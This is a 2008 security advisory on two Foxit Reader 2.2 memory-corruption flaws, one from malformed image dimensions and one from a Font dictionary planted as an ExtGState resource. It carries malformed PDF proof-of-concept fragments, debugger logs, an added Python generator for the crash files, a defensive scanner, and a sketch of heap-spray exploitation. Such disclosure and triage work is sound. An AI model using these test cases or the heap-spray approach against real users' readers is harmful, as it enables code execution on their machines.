[NT] Foxit Reader Malformed PDF Vulnerabilities

Subject: [NT] Foxit Reader Malformed PDF Vulnerabilities
Date: 22 Apr 2008 09:49:26 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Foxit Reader Malformed PDF Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://www.foxitsoftware.com/pdf/rd_intro.php> Foxit Reader is "a free 
PDF document viewer and printer, with incredible small size (only 2.1 M 
download size), breezing-fast launch speed and rich feature set. Foxit 
Reader supports Windows 98/Me/2000/XP/2003/Vista". Two security 
vulnerabilities in Foxit Reader allow a remote attacker armed with a 
malformed PDF file to crash the reader and potentially execute arbitrary 
code.

DETAILS

Vulnerable Systems:
 * Foxit Reader version 2.2

Malformed PDF XObject Value
The vulnerability is triggered when a page whose /XObject resource is an 
image with malformed dimensions is rendered rotated, i.e. when the page 
dictionary also carries a /Rotate entry, as in the test case below.

4 0 obj
<< /Type /Page
/Parent 3 0 R
/Rotate 170
/Contents [ 25 0 R ]
/Resources <<
/ProcSet [ /PDF /Text /ImageB /ImageC ]
/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R  >>>>

endobj

23 0 obj
<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 
5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/ 
#4825#6#25n#00 #6e#6en#25n#72   #25n #r3/Subtype/Image>>
stream
.......................
endstream
endobj

By modifying the /Width and /Height values, Foxit can be made to perform 
invalid memory writes to different addresses. Note in the log below that 
the same width (-87146603762) produces different write targets 
(0x4994e93c and 0x497cd994) in different runs, so the destination depends 
on heap layout as well as on the value:

For example, at EIP=0x51b896, width=-28986631481, height=5:

0051B88F   8B4C24 20        MOV ECX,DWORD PTR SS:[ESP+20]
0051B893   83C4 04          ADD ESP,4
0051B896   89443E 08        MOV DWORD PTR DS:[ESI+EDI+8],EAX 
(eax=0x0, esi=0x10c7fd8, edi=0x26f0020, so the write targets esi+edi+8 = 0x37b8000)
0051B89A   8B4424 10        MOV EAX,DWORD PTR SS:[ESP+10]
0051B89E   43               INC EBX
0051B89F   83C1 04          ADD ECX,4

At EIP=0x51b799, width=-87146603762, height=5:
0051B799   8937             MOV DWORD PTR DS:[EDI],ESI
0051B79B   7E 08            JLE SHORT FOXITR~1.0051B7A5
0051B79D   8977 04          MOV DWORD PTR DS:[EDI+4],ESI
0051B7A0   E9 1C010000      JMP FOXITR~1.0051B8C1
0051B7A5   DB4424 14        FILD DWORD PTR SS:[ESP+14]
..
width=-87146603762 EIP=51b799 write->4994e93c eax=0 ecx=c1a4027f edx=f5a60633 ebx=12efd0 esp=12ef18 ebp=12ef74 esi=0 edi=4994e93c
width=-69826555658 EIP=51b799 write->a82df00 eax=0 ecx=c181027f edx=fdc5c868 ebx=12efd0 esp=12ef18 ebp=12ef74 esi=0 edi=a82df00
width=-56992150114 EIP=51b799 write->16a509d8 eax=0 ecx=c194027f edx=fac27dcc ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=16a509d8
width=-65571130766 EIP=51b799 write->1419ad20 eax=0 ecx=c192027f edx=fb62d4f6 ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=1419ad20
width=-28986631481 EIP=51b896 write->37b8000 eax=0 ecx=10c7fd8 edx=0 ebx=431ff6 esp=13ef18 ebp=13ef74 esi=10c7fd8 edi=26f0020
width=-87146603762 EIP=51b799 write->497cd994 eax=0 ecx=c1a4027f edx=f5ac0a15 ebx=13efd0 esp=13ef18 ebp=13ef74 esi=0 edi=497cd994
..
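To reproduce a test case of this shape in a lab, or to feed a fuzzing harness, the object fragment above has to be wrapped in a complete, well-formed PDF: catalog, page tree, a content stream that actually draws the image with Do (a viewer normally decodes an image XObject only when a content stream references it), and a correct xref table. The following Python script is an added example written for this page; it is not the author's original PoC and is not claimed to crash any particular Foxit version. It emits a one-page PDF whose page carries /Rotate and whose image XObject takes caller-chosen /Width and /Height values, then checks its own xref offsets. Object numbering, the content stream and the stream body (constructed filler bytes standing in for the original 11643-byte DCTDecode stream) are my own choices.

```python
"""Emit a minimal, well-formed PDF with a rotated page whose image XObject
carries caller-chosen /Width and /Height (added example, not the advisory's PoC)."""
import re

# Constructed placeholder for the advisory's 11643-byte DCTDecode stream:
# a JPEG SOI marker, filler, and an EOI marker. It is not a decodable image.
FILLER_JPEG = b"\xff\xd8" + b"\x00" * 64 + b"\xff\xd9"


def build_pdf(width, height, rotate=170, image_data=FILLER_JPEG):
    """Return the bytes of a one-page PDF. Object numbering is my own:
    1 catalog, 2 page tree, 3 page, 4 content stream, 5 image XObject."""
    content = b"q 100 0 0 100 50 50 cm /Im23 Do Q"   # draw the image so it gets decoded
    objs = {
        1: b"<< /Type /Catalog /Pages 2 0 R >>",
        2: b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        3: (b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] /Rotate %d "
            b"/Contents 4 0 R /Resources << /ProcSet [/PDF /ImageC] "
            b"/XObject << /Im23 5 0 R >> >> >>" % rotate),
        4: b"<< /Length %d >>\nstream\n%s\nendstream" % (len(content), content),
        # Python integers are unbounded, so a value such as -28986631481 is
        # written verbatim; how the target reader truncates it is the question.
        5: (b"<< /Type /XObject /Subtype /Image /Width %d /Height %d "
            b"/ColorSpace /DeviceRGB /BitsPerComponent 8 /Filter /DCTDecode "
            b"/Length %d >>\nstream\n%s\nendstream"
            % (width, height, len(image_data), image_data)),
    }
    out = bytearray(b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n")
    offsets = {}
    for num in sorted(objs):
        offsets[num] = len(out)                      # byte offset the xref must record
        out += b"%d 0 obj\n%s\nendobj\n" % (num, objs[num])
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for num in sorted(objs):
        out += b"%010d 00000 n \n" % offsets[num]    # each xref entry is exactly 20 bytes
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objs) + 1, xref_pos))
    return bytes(out)


def check_xref(pdf):
    """True when startxref points at the table and every in-use entry points
    at 'N 0 obj' for the right N, i.e. the file is structurally sound."""
    m = re.search(rb"startxref\n(\d+)\n%%EOF", pdf)
    if not m:
        return False
    xref_pos = int(m.group(1))
    hdr = re.match(rb"xref\n(\d+) (\d+)\n", pdf[xref_pos:])
    if not hdr:
        return False
    first, count = int(hdr.group(1)), int(hdr.group(2))
    table = xref_pos + hdr.end()
    for i in range(count):
        entry = pdf[table + 20 * i: table + 20 * (i + 1)]
        if entry[17:18] == b"f":                     # free entry, nothing to check
            continue
        if not pdf[int(entry[:10]):].startswith(b"%d 0 obj" % (first + i)):
            return False
    return True


if __name__ == "__main__":
    import sys
    w = int(sys.argv[1]) if len(sys.argv) > 1 else -28986631481
    h = int(sys.argv[2]) if len(sys.argv) > 2 else 5
    data = build_pdf(w, h)
    assert check_xref(data)
    with open("xobject_case.pdf", "wb") as f:
        f.write(data)
    print("wrote xobject_case.pdf (%d bytes)" % len(data))
```

Invoked as `python build_case.py -28986631481 5` it writes the file to the working directory; vary the two arguments to walk through the width values listed in the log above. The xref check matters in practice: a reader that falls back to scanning for objects because the offsets are wrong takes a different code path, and a crash found that way is not the one being studied.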

Malformed PDF ExtGState Value
The vulnerability occurs when a malformed /ExtGState resource is parsed. 
In this case the object referenced from the page's /ExtGState dictionary 
was replaced with a (corrupted) /Font dictionary, while the page still 
declares it as an ExtGState resource:

261 0 obj
<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408 ]/CropBox [0 0 531 
666 ]/Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> 
/Contents [20 0 R]>>
endobj

7 0 obj
<</FirstChaaa 1
/Type /Funt /FontDescriptor  23 0 R
/BaseFont /xxxxxxxxxxxxxxxxoman,Italic
/Subtype /TrueType
/Encoding /WinAnsiEncoding
/LaitChar 211
/Wodths [    ]


endobj

23 0 obj
<</zzz9 E /oooooo>>
endobj

Under these conditions Foxit apparently allocates the structures for an 
ExtGState and expects to fill them from the contents of the /ExtGState 
resource. However, when it finds fields that belong to a /Font resource it 
parses them anyway and fills those structures with incorrect data. This 
happens because some functions (mainly the one at address 0x4d1ed0) are 
generic routines that parse any type of field for any type of resource. 
So, when fields of a /Font dictionary appear under an /ExtGState resource, 
they are read and interpreted, and the allocated structures are filled 
with data of the wrong type.


These facts cause various errors during execution. For example, in this 
code:

004A6E04   C74424 04 000000>MOV DWORD PTR SS:[ESP+4],0
004A6E0C   0F84 9A000000    JE foxit_re.004A6EAC
004A6E12   8B41 08          MOV EAX,DWORD PTR DS:[ECX+8]
004A6E15   48               DEC EAX
004A6E16   83F8 08          CMP EAX,8
004A6E19   0F87 8D000000    JA foxit_re.004A6EAC
004A6E1F   FF2485 BC6E4A00  JMP DWORD PTR DS:[EAX*4+4A6EBC]

Consider the instruction mov eax,[ecx+8]. [ecx+8] should hold a field set 
by the parser, but the memory at that location actually contains the first 
name of the dictionary in object 23 0 obj. Since we control that name, we 
control the value loaded from [ecx+8]; after the dec/cmp check above, a 
value in the range 1..9 selects one of the nine handlers in the jump table 
at 0x4A6EBC.

Modifying this dictionary name with different values, we get crashes and 
invalid accesses at different EIPs. For example, with names shorter than 8 
bytes, the last bytes of the name are used as a pointer at EIP = 0x4A6EE7. 
With longer names the structure is filled differently and the behaviour 
changes.

23 0 obj
<</zzzzzzz /oooooo>>
endobj

004A6EE7   8B41 08          MOV EAX,DWORD PTR DS:[ECX+8]
004A6EEA   83E8 02          SUB EAX,2
004A6EED   74 23            JE SHORT foxit_re.004A6F12
004A6EEF   83E8 07          SUB EAX,7
004A6EF2   75 14            JNZ SHORT foxit_re.004A6F08
004A6EF4   8B41 14          MOV EAX,DWORD PTR DS:[ECX+14]
004A6EF7   8B49 10          MOV ECX,DWORD PTR DS:[ECX+10]
004A6EFA   50               PUSH EAX
004A6EFB   E8 20200000      CALL foxit_re.004A8F20

The code involved in this vulnerability is complex, with a lot of FPU and 
mathematical operations, so it is difficult to find correct values to 
exploit the vulnerability. However, I think it is possible to exploit it by 
choosing appropriate values for the input dictionaries and using heap 
spraying to facilitate shellcode execution (heap spraying could be done 
using JavaScript embedded in the PDF file itself; the supplied PDF file 
uses JavaScript with some /Annots events, so we can do the heap spray 
before the crash occurs).
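Both cases in this advisory come down to the parser trusting dictionary contents: an image /Width far outside the integer range the PDF Reference lists as an implementation limit (2^31-1 on 32-bit readers), and an /ExtGState entry that resolves to a dictionary of a different type. The following Python scanner is an added example for triage, not Foxit code and not part of the advisory: it walks the objects of an in-memory PDF and flags (1) image XObjects whose /Width or /Height is outside 1..2^31-1, (2) page /ExtGState entries whose target object declares a /Type other than /ExtGState, and (3) name tokens whose #xx escapes decode to control or non-ASCII bytes, as in the fuzzed /Name of the XObject case. The sample input is constructed from the objects quoted above (the second case's descriptor renumbered to 8 0 obj to avoid a collision, stream bodies shortened, a benign image added as a control); the thresholds and heuristics are my own and indicate malformation, not exploitability.

```python
"""Scan PDF objects for the two malformations discussed in this advisory
(added example for triage; not Foxit code and not the advisory's PoC)."""
import re

INT32_MAX = 2**31 - 1                           # PDF Reference implementation limit for integers
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
NAME_RE = re.compile(rb"/([^\s/<>\[\]()]+)")    # a PDF name token, #xx escapes still raw

# Constructed sample: the advisory's objects, descriptor renumbered to 8 0 obj,
# plus a well-formed image (9 0 obj) that must not be flagged.
SAMPLE = b"""%PDF-1.4
4 0 obj
<< /Type /Page /Parent 3 0 R /Rotate 170 /Contents [ 25 0 R ]
/Resources << /ProcSet [ /PDF /Text /ImageB /ImageC ]
/XObject << /Im23 23 0 R >> /Font << /TT3 33 0 R >> >> >>
endobj
23 0 obj
<< /Length 4 /Filter /DCTDecode /Width -28986631481 /Height
5 /BitsPerComponent 8 /ColorSpace /DeviceRGB /Type /#6eject
/Name /#4825#6#25n#00 /Subtype /Image >>
stream
....
endstream
endobj
261 0 obj
<< /Type /Page /Parent 126 0 R /MediaBox [0 0 259 408] /CropBox [0 0 531 666]
/Resources << /ProcSet [/PDF /Text] /ExtGState << /R7 7 0 R >> >> /Contents [20 0 R] >>
endobj
7 0 obj
<< /FirstChaaa 1 /Type /Funt /FontDescriptor 8 0 R /BaseFont /xxxxxxxxxxxxxxxxoman,Italic
/Subtype /TrueType /Encoding /WinAnsiEncoding /LaitChar 211 /Wodths [ ] >>
endobj
8 0 obj
<< /zzz9 E /oooooo >>
endobj
9 0 obj
<< /Type /XObject /Subtype /Image /Width 16 /Height 16 /BitsPerComponent 8
/ColorSpace /DeviceGray /Length 0 >>
stream
endstream
endobj
"""


def outer_dict(body):
    """Return the first << ... >> in body with nesting respected; an unterminated
    dictionary (as in the advisory's fragments) yields the rest of the body."""
    start = body.find(b"<<")
    if start < 0:
        return b""
    depth, i = 0, start
    while i < len(body) - 1:
        two = body[i:i + 2]
        if two == b"<<":
            depth, i = depth + 1, i + 2
        elif two == b">>":
            depth, i = depth - 1, i + 2
            if depth == 0:
                return body[start:i]
        else:
            i += 1
    return body[start:]


def decode_name(raw):
    """Expand #xx escapes; a '#' not followed by two hex digits is kept literally."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i:i + 1] == b"#" and re.fullmatch(rb"[0-9A-Fa-f]{2}", raw[i + 1:i + 3]):
            out.append(int(raw[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)


def scan(pdf):
    """Return [(object number, message)] for every suspicious dictionary."""
    objs = {int(m.group(1)): outer_dict(m.group(3)) for m in OBJ_RE.finditer(pdf)}
    findings = []
    for num, d in objs.items():
        # 1. image dimensions a 32-bit reader cannot represent (or zero/negative)
        if re.search(rb"/Subtype\s*/Image\b", d):
            for key in (b"Width", b"Height"):
                m = re.search(rb"/" + key + rb"\s+(-?\d+)", d)
                if m and not 1 <= int(m.group(1)) <= INT32_MAX:
                    findings.append((num, "%s out of 32-bit range: %s"
                                     % (key.decode(), m.group(1).decode())))
        # 2. /ExtGState entry whose target object declares some other /Type
        gs = re.search(rb"/ExtGState\s*<<(.*?)>>", d, re.S)
        if gs:
            for ref in re.finditer(rb"/(\S+)\s+(\d+)\s+\d+\s+R", gs.group(1)):
                target = objs.get(int(ref.group(2)), b"")
                t = re.search(rb"/Type\s*/([^\s/<>\[\]()]+)", target)
                if t and t.group(1) != b"ExtGState":
                    findings.append((num, "ExtGState /%s -> %s 0 obj declares /Type /%s"
                                     % (ref.group(1).decode(), ref.group(2).decode(),
                                        t.group(1).decode())))
        # 3. names whose escapes decode to control or non-ASCII bytes (fuzzer signature)
        for name in NAME_RE.finditer(d):
            raw = name.group(1)
            if b"#" in raw and any(c < 0x21 or c > 0x7E for c in decode_name(raw)):
                findings.append((num, "name /%s decodes to non-printable bytes"
                                 % raw.decode("latin-1")))
    return findings


if __name__ == "__main__":
    for num, msg in scan(SAMPLE):
        print("%d 0 obj: %s" % (num, msg))
```

The scanner is deliberately regex-based rather than a full PDF parser: the objects of interest here are exactly the ones a strict parser would reject early, so a loose pass over `N G obj ... endobj` regions sees what a lenient reader such as the one under test sees. Object streams and encrypted files are out of scope for this example.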


ADDITIONAL INFORMATION

The information has been provided by Javier Vicente Vallejo 
(j.v.vallejo@gmail.com).
The original articles can be found at:
http://www.vallejo.cc/proyectos/foxitreader1.htm and 
http://www.vallejo.cc/proyectos/foxitreader2.htm


